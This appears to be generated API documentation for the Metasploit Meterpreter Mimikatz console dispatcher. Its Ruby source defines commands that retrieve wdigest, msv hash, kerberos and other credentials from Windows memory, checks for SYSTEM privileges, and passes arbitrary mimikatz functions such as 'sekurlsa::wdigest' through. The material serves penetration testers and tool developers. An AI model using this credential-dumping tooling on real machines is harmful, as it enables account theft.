Class: Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Mimikatz
Overview
Mimikatz extension - grabs credentials from windows memory.
Benjamin DELPY ‘gentilkiwi` blog.gentilkiwi.com/mimikatz
extension converted by Ben Campbell (Meatballs)
Constant Summary
collapse
- Klass =
Console::CommandDispatcher::Mimikatz
- @@command_opts =
Rex::Parser::Arguments.new(
"-f" => [true, "The function to pass to the command."],
"-a" => [true, "The arguments to pass to the command."],
"-h" => [false, "Help menu."]
)
Instance Attribute Summary
#shell, #tab_complete_items
Instance Method Summary
collapse
check_hash, #client, #log_error, #msf_loaded?, set_hash
#cmd_help, #cmd_help_help, #cmd_help_tabs, #deprecated_cmd, #deprecated_commands, #deprecated_help, #help_to_s, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #tab_complete_filenames, #update_prompt
Constructor Details
#initialize(shell) ⇒ Mimikatz
Initializes an instance of the priv command interaction.
27
28
29
30
31
32
33
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 27
def initialize(shell)
super
if (client.platform =~ /x86/) and (client.sys.config.sysinfo['Architecture'] =~ /x64/)
print_line
print_warning "Loaded x86 Mimikatz on an x64 architecture."
end
end
|
Instance Method Details
#cmd_kerberos(*args) ⇒ Object
142
143
144
145
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 142
def cmd_kerberos(*args)
method = Proc.new { client.mimikatz.kerberos }
mimikatz_request("kerberos", method)
end
|
#cmd_livessp(*args) ⇒ Object
127
128
129
130
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 127
def cmd_livessp(*args)
method = Proc.new { client.mimikatz.livessp }
mimikatz_request("livessp", method)
end
|
#cmd_mimikatz_command(*args) ⇒ Object
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 56
def cmd_mimikatz_command(*args)
if (args.length == 0)
args.unshift("-h")
end
cmd_args = nil
cmd_func = nil
arguments = []
@@command_opts.parse(args) { |opt, idx, val|
case opt
when "-a"
cmd_args = val
when "-f"
cmd_func = val
when "-h"
print(
"Usage: mimikatz_command -f func -a args\n\n" +
"Executes a mimikatz command on the remote machine.\n" +
"e.g. mimikatz_command -f sekurlsa::wdigest -a \"full\"\n" +
@@command_opts.usage)
return true
end
}
unless cmd_func
print_error("You must specify a function with -f")
return true
end
if cmd_args
arguments = cmd_args.split(" ")
end
print_line client.mimikatz.send_custom_command(cmd_func, arguments)
end
|
#cmd_msv(*args) ⇒ Object
122
123
124
125
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 122
def cmd_msv(*args)
method = Proc.new { client.mimikatz.msv }
mimikatz_request("msv", method)
end
|
#cmd_ssp(*args) ⇒ Object
132
133
134
135
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 132
def cmd_ssp(*args)
method = Proc.new { client.mimikatz.ssp }
mimikatz_request("ssp", method)
end
|
#cmd_tspkg(*args) ⇒ Object
137
138
139
140
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 137
def cmd_tspkg(*args)
method = Proc.new { client.mimikatz.tspkg }
mimikatz_request("tspkg", method)
end
|
#cmd_wdigest(*args) ⇒ Object
117
118
119
120
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 117
def cmd_wdigest(*args)
method = Proc.new { client.mimikatz.wdigest }
mimikatz_request("wdigest", method)
end
|
#commands ⇒ Object
List of supported commands.
38
39
40
41
42
43
44
45
46
47
48
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 38
def commands
{
"mimikatz_command" => "Run a custom commannd",
"wdigest" => "Attempt to retrieve wdigest creds",
"msv" => "Attempt to retrieve msv creds (hashes)",
"livessp" => "Attempt to retrieve livessp creds",
"ssp" => "Attempt to retrieve ssp creds",
"tspkg" => "Attempt to retrieve tspkg creds",
"kerberos" => "Attempt to retrieve kerberos creds"
}
end
|
#get_privs ⇒ Object
147
148
149
150
151
152
153
154
155
156
157
158
159
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 147
def get_privs
unless system_check
print_status("Attempting to getprivs")
privs = client.sys.config.getprivs
unless privs.include? "SeDebugPrivilege"
print_warning("Did not get SeDebugPrivilege")
else
print_good("Got SeDebugPrivilege")
end
else
print_good("Running as SYSTEM")
end
end
|
#mimikatz_request(provider, method) ⇒ Object
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 93
def mimikatz_request(provider, method)
get_privs
print_status("Retrieving #{provider} credentials")
accounts = method.call
table = Rex::Ui::Text::Table.new(
'Header' => "#{provider} credentials",
'Indent' => 0,
'SortIndex' => 4,
'Columns' =>
[
'AuthID', 'Package', 'Domain', 'User', 'Password'
]
)
accounts.each do |acc|
table << [acc[:authid], acc[:package], acc[:domain], acc[:user], (acc[:password] || "").gsub("\n","")]
end
print_line table.to_s
return true
end
|
#name ⇒ Object
173
174
175
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 173
def name
"Mimikatz"
end
|
#system_check ⇒ Object
161
162
163
164
165
166
167
168
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb', line 161
def system_check
unless (client.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
print_warning("Not currently running as SYSTEM")
return false
end
return true
end
|